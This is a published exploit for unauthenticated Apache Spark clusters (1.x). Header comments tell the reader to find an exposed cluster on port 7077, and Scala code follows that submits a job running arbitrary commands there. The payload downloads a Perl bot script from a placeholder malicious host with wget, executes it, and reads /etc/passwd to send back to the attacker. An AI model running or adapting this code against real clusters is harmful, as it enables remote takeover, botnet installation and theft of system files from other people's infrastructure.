Apache Spark Cluster version 1.3.x suffers from a code execution vulnerability.
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# Exploit Title: Arbitary Code Execution in Apache Spark Cluster
# Date: 23/03/2015
# Exploit Author: AkhlD (AkhilDas) <akhld@live.com> CodeBreach.in
# Vendor Homepage: https://spark.apache.org/
# Software Link: https://spark.apache.org/downloads.html
# Version: All (0.0.x, 1.1.x, 1.2.x, 1.3.x)
# Tested on: 1.2.1
# Credits: Mayur Rustagi (@mayur_rustagi), Patrick Wendel (@pwendell) for
reviewing.
# Reference(s) :
http://codebreach.in/blog/2015/03/arbitary-code-execution-in-unsecured-apache-spark-cluster/
# Exploit URL : https://github.com/akhld/spark-exploit/
# Spark clusters which are not secured with proper firewall can be taken
over easily (Since it does not have
# any authentication mechanism), this exploit simply runs arbitarty codes
over the cluster.
# All you have to do is, find a vulnerable Spark cluster (usually runs on
port 7077) add that host to your
# hosts list so that your system will recognize it (here its
spark-b-akhil-master pointing
# to 54.155.61.87 in my /etc/hosts) and submit your Spark Job with arbitary
codes that you want to execute.
# Language: Scala
import org.apache.spark.{SparkContext, SparkConf}
/**
* Created by akhld on 23/3/15.
*/
object Exploit {
def main(arg: Array[String]) {
val sconf = new SparkConf()
.setMaster("spark://spark-b-akhil-master:7077") // Set this to the
vulnerable host URI
.setAppName("Exploit")
.set("spark.cores.max", "2")
.set("spark.executor.memory", "2g")
.set("spark.driver.host","hacked.work") // Set this to your host from
where you launch the attack
val sc = new SparkContext(sconf)
sc.addJar("target/scala-2.10/spark-exploit_2.10-1.0.jar")
val exploit = sc.parallelize(1 to 1).map(x=>{
//Replace these with whatever you want to get executed
val x = "wget https://mallicioushost/mal.pl -O bot.pl".!
val y = "perl bot.pl".!
scala.io.Source.fromFile("/etc/passwd").mkString
})
exploit.collect().foreach(println)
}
}
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